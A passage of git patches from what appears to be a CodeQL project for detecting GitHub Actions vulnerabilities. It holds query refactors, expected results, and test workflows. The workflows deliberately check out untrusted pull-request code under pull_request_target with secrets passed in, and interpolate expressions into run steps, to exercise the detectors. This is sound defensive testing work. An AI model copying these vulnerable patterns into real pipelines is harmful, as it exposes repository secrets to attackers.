containsHeadRef(e.getExpression()) or - containsPullRequestNumber(e.getExpression()) - ) and - DataFlow::hasLocalFlowExpr(e, this.getArgumentExpr("ref")) - ) - or - // 3rd party actions returning the PR head sha/ref - exists(UsesStep step | - ( - step.getCallee() = - [ - "eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch", - "alessbell/pull-request-comment-branch", "gotson/pull-request-comment-branch" - ] and - // TODO: This should be read step of the head_sha or head_ref output vars - this.getArgument("ref").regexpMatch(".*(head_ref).*") - or - step.getCallee() = "potiuk/get-workflow-origin" and - // TODO: This should be read step of the ref output var - this.getArgument("ref").matches("%." + ["sourceHeadBranch", "pullRequestNumber"]) - or - step.getCallee() = "github/branch-deploy" and - // TODO: This should be read step of the ref output var - this.getArgument("ref").matches("%.ref%") - ) and - DataFlow::hasLocalFlowExpr(step, this.getArgumentExpr("ref")) + exists(ActionsMutableRefCheckoutFlow::PathNode sink | + ActionsMutableRefCheckoutFlow::flowPath(_, sink) and + sink.getNode().asExpr() = this.getArgumentExpr("ref") ) or // heuristic base on the step id and field name @@ -159,27 +217,9 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { ActionsSHACheckout() { this.getCallee() = "actions/checkout" and ( - // ref argument contains the PR id/number or head ref/sha - exists(Expression e | - containsHeadSHA(e.getExpression()) and - DataFlow::hasLocalFlowExpr(e, this.getArgumentExpr("ref")) - ) - or - // 3rd party actions returning the PR head sha/ref - exists(UsesStep step | - ( - step.getCallee() = - [ - "eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch", - "alessbell/pull-request-comment-branch", "gotson/pull-request-comment-branch" - ] and - this.getArgument("ref").regexpMatch(".*(head_sha).*") - or - step.getCallee() = "potiuk/get-workflow-origin" and - // TODO: This should be read step of the ref output var - this.getArgument("ref").matches("%." + ["sourceHeadSha", "mergeCommitSha"]) - ) and - DataFlow::hasLocalFlowExpr(step, this.getArgumentExpr("ref")) + exists(ActionsSHACheckoutFlow::PathNode sink | + ActionsSHACheckoutFlow::flowPath(_, sink) and + sink.getNode().asExpr() = this.getArgumentExpr("ref") ) or // heuristic base on the step id and field name From a9a297ab78571f563890eb588136a1275d5b4c06 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 10 Sep 2024 09:52:21 +0200 Subject: [PATCH 0499/1267] Update tests --- .../Security/CWE-094/.github/workflows/or.yml | 14 + .../CWE-094/CodeInjectionCritical.expected | 12 + .../CWE-094/CodeInjectionMedium.expected | 10 + .../.github/workflows/pr-workflow-fork.yaml | 27 + .../CWE-829/.github/workflows/pr-workflow.yml | 463 ++++++++++++++++++ .../CWE-829/UnpinnedActionsTag.expected | 10 + .../UntrustedCheckoutCritical.expected | 37 ++ 7 files changed, 573 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/or.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow-fork.yaml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/or.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/or.yml new file mode 100644 index 00000000000..bb873ca4eac --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/or.yml @@ -0,0 +1,14 @@ +name: CI + +on: + pull_request_target: + +jobs: + test: + runs-on: ubuntu-latest + steps: + - run: | + echo ${{ inputs.github_event_pull_request_head_sha || github.sha }} + + + diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 69085548f69..2097a589b5a 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -64,8 +64,12 @@ edges | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | provenance | | | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | provenance | | | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | provenance | | +| .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | provenance | | | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | provenance | | +| .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | provenance | | | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | provenance | | +| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:46 | github.event.comment.body | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | provenance | | +| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:46 | github.event.comment.body | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | provenance | | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | provenance | | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | provenance | | @@ -270,10 +274,16 @@ nodes | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | semmle.label | github.event.head_commit.committer.name | | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | semmle.label | github.event.commits[11].committer.email | | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | semmle.label | github.event.commits[11].committer.name | +| .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | semmle.label | input taint | +| .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | semmle.label | input taint | +| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:46 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:46 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | @@ -434,7 +444,9 @@ subpaths | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | +| .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:46 | github.event.comment.body | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | ${{ env.log }} | +| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:46 | github.event.comment.body | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 360c33720fb..ce4d74467f9 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -64,8 +64,12 @@ edges | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | provenance | | | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | provenance | | | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | provenance | | +| .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | provenance | | | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | provenance | | +| .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | provenance | | | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | provenance | | +| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:46 | github.event.comment.body | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | provenance | | +| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:46 | github.event.comment.body | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | provenance | | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | provenance | | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | provenance | | @@ -270,10 +274,16 @@ nodes | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | semmle.label | github.event.head_commit.committer.name | | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | semmle.label | github.event.commits[11].committer.email | | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | semmle.label | github.event.commits[11].committer.name | +| .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | semmle.label | input taint | +| .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | semmle.label | input taint | +| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:46 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:46 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow-fork.yaml b/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow-fork.yaml new file mode 100644 index 00000000000..98c25f83231 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow-fork.yaml @@ -0,0 +1,27 @@ +name: "pr-workflow-fork" +concurrency: + group: ${{ github.workflow }}-pr-workflow-fork-${{ github.event.pull_request.number || github.ref }} + cancel-in-progress: true + +on: + pull_request_target: + +jobs: + pr-workflow-fork: + uses: ./.github/workflows/pr-workflow.yml + with: + github_event_name: ${{ github.event_name }} + github_event_pull_request_head_repo_id : ${{ github.event.pull_request.head.repo.id }} + github_workflow: $ {{ github.workflow }} + github_event_pull_request_head_sha: ${{ github.event.pull_request.head.sha }} + flow: ${{( github.event_name == 'push' && 'push' ) || ( github.event_name == 'merge_group' && 'merge_queue_check' ) || ( github.event_name == 'pull_request_target' && github.event.pull_request.head.repo.id != 383289760 && 'pr_from_fork' ) || ( github.event_name == 'pull_request' && github.event.pull_request.head.repo.id == 383289760 && 'pr_from_branch' )}} + sha_to_check: ${{ github.event.pull_request.head.sha || github.sha }} + + secrets: + CACHIX_AUTH_TOKEN: ${{ secrets.CACHIX_AUTH_TOKEN }} + DOCKER_HUB_USERNAME: ${{ secrets.DOCKER_HUB_USERNAME }} + DOCKER_HUB_ACCESS_TOKEN: ${{ secrets.DOCKER_HUB_ACCESS_TOKEN }} + PABLO_PROJ_JSON: ${{ secrets.PABLO_PROJ_JSON }} + VERCEL_TOKEN: ${{ secrets.VERCEL_TOKEN }} + CANCEL_GITHUB_TOKEN: ${{ github.token }} + NIXBUILD_TOKEN: ${{ secrets.NIXBUILD_TOKEN }} diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml new file mode 100644 index 00000000000..061ff7d02c5 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml @@ -0,0 +1,463 @@ +name: "pr-workflow" +concurrency: + group: ${{ github.workflow }}-pr-workflow-${{ github.event.pull_request.number || github.ref }} + cancel-in-progress: true +on: + workflow_call: + inputs: + github_event_name: + required: true + type: string + github_event_pull_request_head_repo_id: + required: true + type: number + github_workflow: + required: true + type: string + github_event_pull_request_head_sha: + required: true + type: string + flow: + required: true + type: string + sha_to_check: + required: true + type: string + secrets: + NIXBUILD_TOKEN: + required: true + CACHIX_AUTH_TOKEN: + required: true + DOCKER_HUB_USERNAME: + required: true + DOCKER_HUB_ACCESS_TOKEN: + required: true + PABLO_PROJ_JSON: + required: true + VERCEL_TOKEN: + required: true + CANCEL_GITHUB_TOKEN: + required: true + +permissions: + pull-requests: write + +jobs: + dependency-review: + outputs: + ok: ${{ steps.ok.outputs.ok }} + concurrency: + group: ${{ inputs.github_workflow }}-dependency-review-${{ github.event.pull_request.number || github.ref }} + cancel-in-progress: true + needs: + - privilege-check + runs-on: + - ubuntu-latest + steps: + - name: checkout + uses: actions/checkout@v3 + if: ${{ inputs.github_event_name != 'merge_group' && inputs.github_event_name != 'push' }} + - uses: amannn/action-semantic-pull-request@v5 + if: ${{ inputs.github_event_name != 'merge_group' && inputs.github_event_name != 'push' }} + with: + requireScope: false + subjectPattern: (.*[a-zA-Z].*){16,} + subjectPatternError: | + https://regexper.com/#%28.*%5Ba-zA-Z%5D.*%29%7B16%2C%7D + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + + - name: dependency-review + if: ${{ inputs.github_event_name != 'merge_group' && inputs.github_event_name != 'push' }} + uses: actions/dependency-review-action@v3 + with: + # GHSA-pfrx-2q88-qq97, GHSA-w5p7-h5w8-2hfq, GHSA-wcg3-cvx6-7396 are ignored because they are casued by the static Docusaurus build. Please remove when Docusaurus gets updated. + # GHSA-969w-q74q-9j8v, GHSA-44mr-8vmm-wjhg, GHSA-wh6w-3828-g9qf are ignored because they are transitive dependencies still used by the master branch of Substrate. Please remove when Substrate update the according dependencies. + # GHSA-fjx5-qpf4-xjf2 is ignored because it is a transitive dependencies still used by the master branch of ibc-proto-rs. Please remove when ibc-rs-proto updates it. + allow-ghsas: GHSA-pfrx-2q88-qq97, GHSA-w5p7-h5w8-2hfq, GHSA-wcg3-cvx6-7396, GHSA-969w-q74q-9j8v, GHSA-44mr-8vmm-wjhg, GHSA-wh6w-3828-g9qf, GHSA-ff4p-7xrq-q5r8, GHSA-xm67-587q-r2vw, GHSA-fjx5-qpf4-xjf2 + - id: ok + run: echo "ok=true" >> "$GITHUB_OUTPUT" + + privilege-check: + name: "privilege-check" + if: ${{ inputs.flow == 'push' || inputs.github_event_name == 'merge_group' || (inputs.github_event_name == 'pull_request_target' && inputs.github_event_pull_request_head_repo_id != 383289760) || (inputs.github_event_name == 'pull_request' && inputs.github_event_pull_request_head_repo_id == 383289760) }} + continue-on-error: false + runs-on: ubuntu-latest + steps: + - run: | + echo "${{ inputs.github_event_name }}"" + echo "${{ inputs.flow }}"" + echo "${{ github.ref_name }}" + echo "${{ inputs.github_event_pull_request_head_repo_id }}" + + lfs-check: + name: lfs-check + needs: + - privilege-check + continue-on-error: false + runs-on: ubuntu-latest + concurrency: + group: ${{ inputs.github_workflow }}-lfs-check-${{ github.event.pull_request.number || github.ref }} + cancel-in-progress: true + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} + persist-credentials: false + submodules: false + lfs: true + - uses: actionsdesk/lfs-warning@v3.2 + name: lfs-warning + with: + labelName: lfs-detected! + filesizelimit: 20KB + exclusionPatterns: | + **/*.rs + **/*.ts + **/*.md + **/*.json + **/*.lock + **/*.nix + **/*.sol + **/*.toml + flake/eth-pos-devnet + - run: echo ${{ steps.lfs-warning.outputs.lfsFiles }} + + nix-flake-check: + name: "nix-flake-check" + outputs: + ok: ${{ steps.ok.outputs.ok }} + needs: + - privilege-check + runs-on: + - ubuntu-latest-m + continue-on-error: false + concurrency: + group: ${{ inputs.github_workflow }}-nix-flake-check-${{ github.event.pull_request.number || github.ref }} + cancel-in-progress: true + steps: + - uses: actions/checkout@v3 + with: + lfs: true + ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} + persist-credentials: false + - uses: cachix/install-nix-action@v20 + with: + nix_path: nixpkgs=channel:nixos-unstable + - uses: DeterminateSystems/magic-nix-cache-action@main + - uses: cachix/cachix-action@master + with: + authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}" + name: composable + skipAddingSubstituter: false + skipPush: false + - run: | + nix --version + nix show-config + nix run .#nix-flake-check --accept-flake-config + - id: ok + run: echo "ok=true" >> "$GITHUB_OUTPUT" + + + # build-all-outputs-packages-arm: + # outputs: + # ok: ${{ steps.ok.outputs.ok }} + # name: build-all-outputs-packages-arm + # needs: + # - privilege-check + # runs-on: + # - aarch64-linux-80C-128GB-2048GB + # concurrency: + # group: ${{ inputs.github_workflow }}-build-all-outputs-packages-arm-${{ github.event.pull_request.number || github.ref }} + # cancel-in-progress: true + # steps: + # - name: Set up Cachix + # if: ${{ inputs.flow == 'push' }} + # uses: cachix/cachix-action@586bf280495080c5a6d4868237ad28a860e4b309 + # with: + # authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}" + # name: composable + # installCommand: "true" + # - uses: actions/checkout@v3 + # if: ${{ inputs.flow == 'push' }} + # with: + # lfs: true + # ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} + # persist-credentials: false + # - name: Build all packages + # if: ${{ inputs.flow == 'push' }} + # uses: "./.github/templates/watch-exec" + # with: + # command: nix -- build .#all-outputs + # - id: ok + # run: echo "ok=true" >> "$GITHUB_OUTPUT" + + + build-all-outputs-packages: + outputs: + ok: ${{ steps.ok.outputs.ok }} + name: build-all-outputs-packages + needs: + - privilege-check + - build-all-deps-packages + runs-on: + - x86_64-linux-32C-128GB-2TB + concurrency: + group: ${{ inputs.github_workflow }}-build-all-outputs-packages-${{ github.event.pull_request.number || github.ref }} + cancel-in-progress: true + steps: + - name: Set up Cachix + if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' }} + uses: cachix/cachix-action@586bf280495080c5a6d4868237ad28a860e4b309 + with: + authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}" + name: composable + installCommand: "true" + - uses: actions/checkout@v3 + if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' }} + with: + lfs: true + ref: ${{ inputs.github_event_pull_request_head_sha }} + persist-credentials: false + - name: Build all packages + if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' }} + uses: "./.github/templates/watch-exec" + with: + command: nix -- build .#all-outputs + - id: ok + run: echo "ok=true" >> "$GITHUB_OUTPUT" + + build-all-checks-packages: + outputs: + ok: ${{ steps.ok.outputs.ok }} + name: build-all-checks-packages + needs: + - privilege-check + - build-all-outputs-packages + runs-on: + - x86_64-linux-32C-128GB-2TB + concurrency: + group: ${{ inputs.github_workflow }}-build-all-checks-packages-${{ github.event.pull_request.number || github.ref }} + cancel-in-progress: true + steps: + - name: Set up Cachix + if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' }} + uses: cachix/cachix-action@586bf280495080c5a6d4868237ad28a860e4b309 + with: + authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}" + name: composable + installCommand: "true" + - uses: actions/checkout@v3 + if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' }} + with: + lfs: true + ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} + persist-credentials: false + - name: Build all packages + if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' }} + uses: "./.github/templates/watch-exec" + with: + command: nix -- build .#all-checks + - id: ok + run: echo "ok=true" >> "$GITHUB_OUTPUT" + + + build-all-deps-packages: + name: build-all-deps-packages + outputs: + ok: ${{ steps.ok.outputs.ok }} + needs: + - privilege-check + runs-on: + - x86_64-linux-32C-128GB-2TB + concurrency: + group: ${{ inputs.github_workflow }}-build-all-deps-packages-${{ matrix.runner }}-${{ github.event.pull_request.number || github.ref }} + cancel-in-progress: true + steps: + - name: Set up Cachix + if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' || inputs.flow == 'pr_from_fork' }} + uses: cachix/cachix-action@586bf280495080c5a6d4868237ad28a860e4b309 + with: + authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}" + name: composable + installCommand: "true" + - uses: actions/checkout@v3 + if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' || inputs.flow == 'pr_from_fork' }} + with: + lfs: true + ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} + persist-credentials: false + - name: build-all-deps-packages + if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' || inputs.flow == 'pr_from_fork' }} + uses: "./.github/templates/watch-exec" + with: + command: nix -- build .#all-deps + - id: ok + run: echo "ok=true" >> "$GITHUB_OUTPUT" + + draft-release-check: + name: "draft-release-check" + if: ${{ failure() || cancelled() || success() }} + continue-on-error: false + runs-on: ubuntu-latest + needs: + - build-all-checks-packages + - dependency-review + - nix-flake-check + - mantis-e2e + steps: + - run: | + echo "nix-flake-check" ${{ needs.nix-flake-check.outputs.ok }} + echo "dependency-review" ${{ needs.dependency-review.outputs.ok }} + echo "build-all-checks-packages" ${{ needs.build-all-checks-packages.outputs.ok }} + echo "mantis-e2e" ${{ needs.mantis-e2e.outputs.ok }} + - if: ${{ needs.nix-flake-check.outputs.ok == 'true' && needs.dependency-review.outputs.ok == 'true' && needs.build-all-checks-packages.outputs.ok == 'true' && needs.mantis-e2e.outputs.ok == 'true' }} + run: | + echo "All dependencies built well" + exit 0 + - if: ${{ !(needs.nix-flake-check.outputs.ok == 'true' && needs.dependency-review.outputs.ok == 'true' && needs.build-all-checks-packages.outputs.ok == 'true' && needs.mantis-e2e.outputs.ok == 'true' ) }} + run: | + echo "Some of dependencies (see jobs graph, needs attributes, and output of this job) failed" + exit 42 + + draft-release-artifacts: + name: "draft-release-artifacts" + runs-on: + - x86_64-linux-32C-128GB-2TB + needs: + - draft-release-check + if: ${{ inputs.github_event_name == 'push' }} + permissions: + pull-requests: write + contents: write + concurrency: + group: ${{ inputs.github_workflow }}-draft-release-artifacts-${{ github.ref }} + cancel-in-progress: true + steps: + - name: Set up Cachix + uses: cachix/cachix-action@586bf280495080c5a6d4868237ad28a860e4b309 + with: + authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}" + name: composable + installCommand: "true" + - uses: actions/checkout@v3 + with: + fetch-depth: 0 + - name: Login to DockerHub + uses: docker/login-action@v2 + with: + username: ${{ secrets.DOCKER_HUB_USERNAME }} + password: ${{ secrets.DOCKER_HUB_ACCESS_TOKEN }} + - name: Download artifacts + run: | + nix run .#generate-release-artifacts --print-build-logs + + - name: Release artifacts + uses: softprops/action-gh-release@v1 + with: + draft: true + prerelease: false + fail_on_unmatched_files: true + generate_release_notes: true + body_path: release-artifacts/release.txt + name: ${{ github.ref_name }} + tag_name: ${{ github.ref_name }} + target_commitish: ${{ github.sha }} + files: | + release-artifacts/to-upload/* + + push-docker-images: + name: push-docker-images + if: ${{ inputs.flow == 'push' }} + needs: + - draft-release-check + runs-on: + - x86_64-linux-32C-128GB-2TB + concurrency: + group: ${{inputs.flow}}-${{ inputs.github_workflow }}-push-docker-images-${{ github.event.pull_request.number || github.ref }} + cancel-in-progress: false + steps: + - name: Set up Cachix + uses: cachix/cachix-action@586bf280495080c5a6d4868237ad28a860e4b309 + with: + authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}" + name: composable + installCommand: "true" + - uses: actions/checkout@v3 + with: + lfs: true + ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} + persist-credentials: false + - name: Build all packages + uses: "./.github/templates/watch-exec" + with: + command: nix -- build .#all + - name: Publish cmc-api to docker hub + uses: "./.github/templates/docker-publish" + with: + image_path: result/docker-image-cmc-api.tar.gz + username: ${{ secrets.DOCKER_HUB_USERNAME }} + password: ${{ secrets.DOCKER_HUB_ACCESS_TOKEN }} + name: cmc-api + artifact: cmc-api:latest + + - name: Publish devnet-xc to docker hub + uses: "./.github/templates/docker-publish" + with: + image_path: result/docker-image-devnet-xc.tar.gz + username: ${{ secrets.DOCKER_HUB_USERNAME }} + password: ${{ secrets.DOCKER_HUB_ACCESS_TOKEN }} + name: devnet-xc + artifact: devnet-xc:latest + tag: ${{ inputs.github_event_name == 'push' && 'main' || ''}} + + - name: Publish hyperspace-composable-rococo-picasso-rococo to docker hub + uses: "./.github/templates/docker-publish" + with: + image_path: result/hyperspace-composable-rococo-picasso-rococo.tar.gz + username: ${{ secrets.DOCKER_HUB_USERNAME }} + password: ${{ secrets.DOCKER_HUB_ACCESS_TOKEN }} + name: hyperspace-composable-rococo-picasso-rococo + artifact: hyperspace-composable-rococo-picasso-rococo:latest + + - name: Publish hyperspace-composable-polkadot-picasso-kusama to docker hub + uses: "./.github/templates/docker-publish" + with: + image_path: result/hyperspace-composable-polkadot-picasso-kusama.tar.gz + username: ${{ 